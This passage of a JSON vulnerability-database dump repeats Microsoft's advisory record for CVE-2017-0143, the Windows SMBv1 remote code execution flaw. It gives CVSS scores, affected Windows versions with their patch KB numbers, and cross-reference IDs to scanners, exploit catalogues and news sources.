"KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 
for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-17T22:48:26", "differentElements": ["msAffectedSoftware"], "edition": 56}, {"bulletin": {"id": 
"MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-18T00:49:58", "history": [], "viewCount": 9, 
"enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": 
["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-16T12:44:29", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-16T12:44:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBMS16-110, 3187754", "KB4012212", "KB4012215", "KB3210720", "KB4012598", "KB4012213", "KB4013429", "KB3205401", "KB4012606", "KB3213986", "KB3210721", "KB3205409", "KB4013198", "KB4012214", "KB3177186", "KB4012216", "KB3212646", "KB4012217"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", 
"msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": 
"KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": 
"KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", 
"kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-18T00:49:58", "differentElements": ["msAffectedSoftware"], "edition": 57}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-18T02:48:09", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": 
"talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", 
"RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-18T02:48:09", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-18T02:48:09", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210720", "KB4012212", "KB4012213", "KB3210721", "KB4013198", "KBMS16-110, 3187754", "KB4012606", "KB3205409", "KB4012217", "KB3205401", "KB3212646", "KB4013429", "KB4012215", "KB3177186", "KB3213986", "KB4012216", "KB4012214", "KB4012598"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 
for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-18T02:48:09", "differentElements": ["msAffectedSoftware"], "edition": 58}, {"bulletin": {"id": 
